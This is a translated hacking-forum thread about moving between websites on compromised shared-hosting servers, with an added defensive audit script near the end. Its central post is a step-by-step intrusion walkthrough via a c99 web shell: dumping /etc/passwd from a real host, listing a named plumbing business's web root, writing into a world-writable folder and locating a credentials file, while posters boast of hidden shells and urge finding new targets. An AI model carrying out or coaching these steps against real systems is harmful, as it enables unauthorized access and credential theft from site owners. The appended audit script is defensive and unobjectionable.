Jumping on Windows servers

anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Jumping on Windows servers

Post by anharku » Thu Aug 05, 2010 11:57 am

Hmm.. some info here, I'll share it in case anyone doesn't know about jumping on Windows servers yet :circle:
From what I've learned, if you get a Windows server and its root directory contains something named domains or wwwroot, then there is usually a long list of domains you can jump to... but it also depends on luck with the access rights, hehehe :devil
Once you've got something like that, what are you going to do with it, hmm? That's up to you, you bear your own sins :devil

Regards
anharku

abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../

Re: Jumping on Windows servers

Post by abit doang » Thu Aug 05, 2010 1:26 pm

Hehe..
On Windows it really is easier to look around the files and dirs..
Look through all the drives and dirs, there might be some cute files.. :P
O Allah, make us all wealthy so that we can share even more :)
and grant us the best life partner from You.
Amen.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/

Xshadow
Posts: 482
Joined: Thu May 31, 2007 8:01 pm
Location: http://captureflags.com

Re: Jumping on Windows servers

Post by Xshadow » Thu Aug 05, 2010 9:42 pm

Windows or Linux, it doesn't matter... the easiest way is to read its httpd.conf first
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare

anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: Jumping on Windows servers

Post by anharku » Fri Aug 06, 2010 10:10 am

Xshadow wrote: Windows or Linux, it doesn't matter... the easiest way is to read its httpd.conf first
Hmm... thanks, bro, for the input :kaca:

3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~

Re: Jumping on Windows servers

Post by 3xtr3m3b0y » Sat Aug 07, 2010 4:25 pm

Even easier, just go UP..UP..UP, bro
...n0 l1m17...

abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../

Re: Jumping on Windows servers

Post by abit doang » Sat Aug 07, 2010 5:50 pm

What about a shell like mine..??
Looks like it's stuck for good...
Permission 755, and no important files either..
Can't go UP either..
Or can it still be shaken loose???

http://mau-tau-aja.lu/apaajaboleh/INF0.php
NB: the file was uploaded via FTP, found on its sibling website..
NB2: shell (link) location, hidden by me..
NB3: if you want to know the location, please PM me..
:tapa: :maaf: :devil :malumalu: :circle:
Last edited by abit doang on Sun Aug 08, 2010 7:51 pm, edited 3 times in total.

3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~

Re: Jumping on Windows servers

Post by 3xtr3m3b0y » Sun Aug 08, 2010 8:33 am

abit doang wrote: What about a shell like mine..??
Looks like it's stuck for good...
Permission 755, and no important files either..
Can't go UP either..
Or can it still be shaken loose???
It's still very doable, bro:
What we have to work with right now:
Webshell: c99
Web directory path: /home/<user>/public_html

With those two assets we can look for writable locations as well as database login info. Here are the steps I can take:

1. Look at the contents of /etc/passwd
Type this in the Command Execution section:
cat /etc/passwd
The list of users on the system will then be shown.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
loansnow:x:512:512::/home/loansnow:/bin/bash
jk:x:32007:32009::/home/jk:/bin/bash
murrland:x:513:513::/home/murrland:/bin/bash
murrclas:x:514:514::/home/murrclas:/bin/bash
wwwinre:x:515:515::/home/wwwinre:/bin/bash
wwwcoor:x:516:516::/home/wwwcoor:/bin/bash
magpie:x:517:517::/home/magpie:/bin/bash
wwwbbc:x:518:518::/home/wwwbbc:/bin/bash
wwwtaa:x:519:519::/home/wwwtaa:/bin/bash
wwwremfi:x:520:520::/home/wwwremfi:/bin/bash
murrcom:x:521:521::/home/murrcom:/bin/bash
wwwclic:x:522:522::/home/wwwclic:/bin/bash
wwwsesa:x:523:523::/home/wwwsesa:/bin/bash
wwwscsa:x:524:524::/home/wwwscsa:/bin/bash
wwwbb:x:525:525::/home/wwwbb:/bin/bash
wwwbv:x:526:526::/home/wwwbv:/bin/bash
westate:x:528:528::/home/westate:/usr/local/cpanel/bin/jailshell
djautos:x:529:529::/home/djautos:/usr/local/cpanel/bin/jailshell
raptchau:x:530:530::/home/raptchau:/bin/bash
wwwweb:x:531:531::/home/wwwweb:/bin/bash
supasorb:x:532:532::/home/supasorb:/bin/bash
yoshiki:x:533:533::/home/yoshiki:/bin/bash
bcampers:x:534:534::/home/bcampers:/bin/bash
wwwposi:x:535:535::/home/wwwposi:/usr/local/cpanel/bin/noshell
wwwbsre:x:536:536::/home/wwwbsre:/usr/local/cpanel/bin/noshell
wwwmjf:x:537:537::/home/wwwmjf:/bin/bash
wwwblue:x:538:538::/home/wwwblue:/usr/local/cpanel/bin/noshell
wwwace4:x:539:539::/home/wwwace4:/usr/local/cpanel/bin/noshell
wwwaloa:x:540:540::/home/wwwaloa:/usr/local/cpanel/bin/noshell
wwwmorg:x:541:541::/home/wwwmorg:/usr/local/cpanel/bin/noshell
wwwfair:x:542:542::/home/wwwfair:/usr/local/cpanel/bin/noshell
themurrl:x:543:543::/home/themurrl:/bin/bash
wwwrich:x:544:544::/home/wwwrich:/bin/bash
raok:x:545:545::/home/raok:/usr/local/cpanel/bin/noshell
wwwstyl:x:546:546::/home/wwwstyl:/usr/local/cpanel/bin/noshell
wwwsama:x:547:547::/home/wwwsama:/usr/local/cpanel/bin/noshell
wwwwater:x:548:548::/home/wwwwater:/bin/bash
wwwmill:x:549:549::/home/wwwmill:/bin/bash
wwwbcam:x:550:550::/home/wwwbcam:/bin/bash
hillssa:x:551:551::/home/hillssa:/bin/bash
wwwaldi:x:552:552::/home/wwwaldi:/bin/bash
propoly:x:553:553::/home/propoly:/bin/bash
mwl33577:x:554:554::/home/mwl33577:/usr/local/cpanel/bin/jailshell
wwwcindy:x:555:555::/home/wwwcindy:/bin/bash
wwwharr:x:556:556::/home/wwwharr:/bin/bash
wwwsaski:x:557:557::/home/wwwsaski:/bin/bash
hartmann:x:558:558::/home/hartmann:/bin/bash
miniminy:x:559:559::/home/miniminy:/bin/bash
wwwurban:x:560:560::/home/wwwurban:/bin/bash
ehmpcg:x:561:561::/home/ehmpcg:/bin/bash
wwwincon:x:562:562::/home/wwwincon:/bin/bash
wwwgecr:x:563:563::/home/wwwgecr:/bin/bash
wwwholb:x:564:564::/home/wwwholb:/bin/bash
murray:x:565:565::/home/murray:/usr/local/cpanel/bin/jailshell
masonsre:x:566:566::/home/masonsre:/usr/local/cpanel/bin/jailshell
wwwdogs:x:567:567::/home/wwwdogs:/bin/bash
mbbook:x:568:568::/home/mbbook:/bin/bash
blondies:x:569:569::/home/blondies:/bin/bash
wwwmach:x:570:570::/home/wwwmach:/bin/bash
polarpri:x:571:571::/home/polarpri:/usr/local/cpanel/bin/noshell
polardis:x:573:573::/home/polardis:/bin/bash
mclascom:x:503:500::/home/mclascom:/bin/bash
polar2:x:504:501::/home/polar2:/bin/bash
wwwcool:x:505:502::/home/wwwcool:/bin/bash
murraybr:x:506:503::/home/murraybr:/bin/bash
mbmotel:x:507:504::/home/mbmotel:/bin/bash
wwwridl:x:508:505::/home/wwwridl:/bin/bash
spirit09:x:509:506::/home/spirit09:/bin/bash
mbunited:x:574:507::/home/mbunited:/bin/bash
aungerre:x:575:508::/home/aungerre:/bin/bash
bexhaust:x:576:509::/home/bexhaust:/bin/bash
taylored:x:577:574::/home/taylored:/bin/bash
wwwzen:x:578:575::/home/wwwzen:/bin/bash
mbmerc:x:579:576::/home/mbmerc:/bin/bash
wwwroof:x:580:577::/home/wwwroof:/bin/bash
wwwopen:x:581:578::/home/wwwopen:/bin/bash
leadinge:x:582:579::/home/leadinge:/bin/bash
wwwpure:x:583:580::/home/wwwpure:/bin/bash
wwwspend:x:584:581::/home/wwwspend:/bin/bash
mbplay:x:585:582::/home/mbplay:/bin/bash
wwwlej:x:586:583::/home/wwwlej:/bin/bash
wwwtoto:x:587:584::/home/wwwtoto:/bin/bash
wwwmbweb:x:588:585::/home/wwwmbweb:/bin/bash
wwwdab:x:589:586::/home/wwwdab:/bin/bash
polar3:x:590:587::/home/polar3:/bin/bash
wwwprint:x:591:588::/home/wwwprint:/bin/bash
wwwmbmc:x:592:589::/home/wwwmbmc:/bin/bash
mbinvest:x:593:590::/home/mbinvest:/bin/bash
My target this time is the user named hartmann

2. From the user info we have obtained, we can try to get into each user's webdir.

ls -l /home/hartmann/public_html

Result:

total 2072
-rw-r--r-- 1 hartmann hartmann    8327 Nov 21  2009 AC_RunActiveContent.js
drwxr-xr-x 2 hartmann hartmann    4096 Sep 25  2009 admin
drwxr-xr-x 2 hartmann hartmann    4096 Sep 10  2009 cgi-bin
-rw-r--r-- 1 hartmann hartmann   12763 Nov 23  2009 contactus.htm
drwxr-xr-x 3 hartmann hartmann    4096 Sep 24  2009 css
-rw-r--r-- 1 hartmann hartmann    7760 Sep 24  2009 gallery.htm
drwxrwxrwx 2 hartmann hartmann    4096 Mar  7 18:06 galleryimages
-rw-r--r-- 1 hartmann hartmann    9319 Nov 21  2009 gallery.php
-rw-r--r-- 1 hartmann hartmann   43815 Nov 21  2009 hartwhite.swf
-rw-r--r-- 1 hartmann hartmann   24155 Nov 23  2009 home.htm
drwxr-xr-x 3 hartmann hartmann    4096 Nov 21  2009 images
drwxr-xr-x 2 hartmann hartmann    4096 Sep 24  2009 include
-rw-r--r-- 1 hartmann hartmann    4470 Oct 27  2009 meetthestaff.htm
drwxr-xr-x 4 hartmann hartmann    4096 Sep 15  2009 _mm
drwxr-xr-x 2 hartmann hartmann    4096 Nov 23  2009 _notes
-rw-r--r-- 1 hartmann hartmann     132 Sep 15  2009 robots.txt
-rw-r--r-- 1 hartmann hartmann    6629 Nov 23  2009 services.htm
-rw-r--r-- 1 hartmann hartmann    8949 Nov 21  2009 Southcoast.htm
-rw-r--r-- 1 hartmann hartmann 1931680 Oct 23  2009 swflash.cab
3. Finding a writable location:
From the list of files and dirs shown above, there is 1 location we can write to, namely:

drwxrwxrwx 2 hartmann hartmann 4096 Mar 7 18:06 galleryimages

We can go straight to that location, then upload or create our own file.
The result:
http://hartmannplumbing.com.au/galleryi ... 3m3b0y.txt

4. Another thing we can do is look for database connection info.
My eye was drawn to the directory:
drwxr-xr-x 2 hartmann hartmann 4096 Sep 24 2009 include

I then went into that location and found some interesting files:

total 172
-rw-r--r-- 1 hartmann hartmann   1870 Sep 24  2009 dbfunctions.inc
-rw-r--r-- 1 hartmann hartmann   4968 Sep 24  2009 functions.inc
-rw-r--r-- 1 hartmann hartmann   4014 Sep 15  2009 gallery.css
-rw-r--r-- 1 hartmann hartmann  11630 Sep 15  2009 gallery.js
-rw-r--r-- 1 hartmann hartmann 120620 Sep 15  2009 jquery.js
-rw-r--r-- 1 hartmann hartmann    106 Sep 24  2009 logins.inc
-rw-r--r-- 1 hartmann hartmann   4021 Sep 15  2009 thickbox.css
-rw-r--r-- 1 hartmann hartmann  11629 Sep 15  2009 thickbox.js
Next I tried opening the contents of the logins.inc file
The result:
Just check it yourself... :P

Ok, that's all folks
...n0 l1m17...
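
The post above works only because other accounts' home directories are listable, an upload folder is mode 777, and logins.inc is mode 644. The following audit is an added example, not part of the thread, that a hosting administrator could run to find exactly those three conditions; the `<base>/<user>/public_html` layout and the filename patterns are assumptions.

```shell
#!/bin/sh
# Added example, not from the thread. Assumes accounts live at <base>/<user>
# with the web root in public_html; the filename patterns are assumptions.
# Prints one finding per line: "<KIND> <path>".
audit_webroots() {
    audit_base="${1:-/home}"
    for audit_home in "$audit_base"/*/; do
        audit_home="${audit_home%/}"
        [ -d "$audit_home" ] || continue

        # Home directory that other accounts can list (r) or enter (x).
        find "$audit_home" -prune \( -perm -0004 -o -perm -0001 \) -print |
            sed 's/^/HOME_OPEN /'

        audit_web="$audit_home/public_html"
        [ -d "$audit_web" ] || continue

        # World-writable directories, e.g. an upload folder left at 777.
        find "$audit_web" -type d -perm -0002 -print |
            sed 's/^/WORLD_WRITABLE_DIR /'

        # World-readable files whose names suggest stored credentials.
        find "$audit_web" -type f -perm -0004 \
            \( -name '*.inc' -o -name '*config*' -o -name '*login*' \) -print |
            sed 's/^/WORLD_READABLE_CRED /'
    done
}

# Typical use on a hosting box (run as root so every tree is readable):
#   audit_webroots /home
```

Each HOME_OPEN line is an account whose tree other tenants can walk; tightening the home directory to 750 or 711 with the web server in the owning group, and moving credential files out of the web root, removes the conditions the walkthrough depends on.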

anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: Jumping on Windows servers

Post by anharku » Sun Aug 08, 2010 12:25 pm

Thanks, 3xtr3m3b0y, for the technique..
There, now you've been taught :circle:
Try various approaches.. if you're really stuck, then just find another target :devil

abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../

Re: Jumping on Windows servers

Post by abit doang » Sun Aug 08, 2010 7:12 pm

@ 3xtr3m3b0y
Thanks, bro, that's new knowledge for me..
So the point is, even though we can't change dir -> $cd
there's still a chance to $ls | $cat | etc..
Awesome.....
:kaca: :tapa: :licik: :malumalu: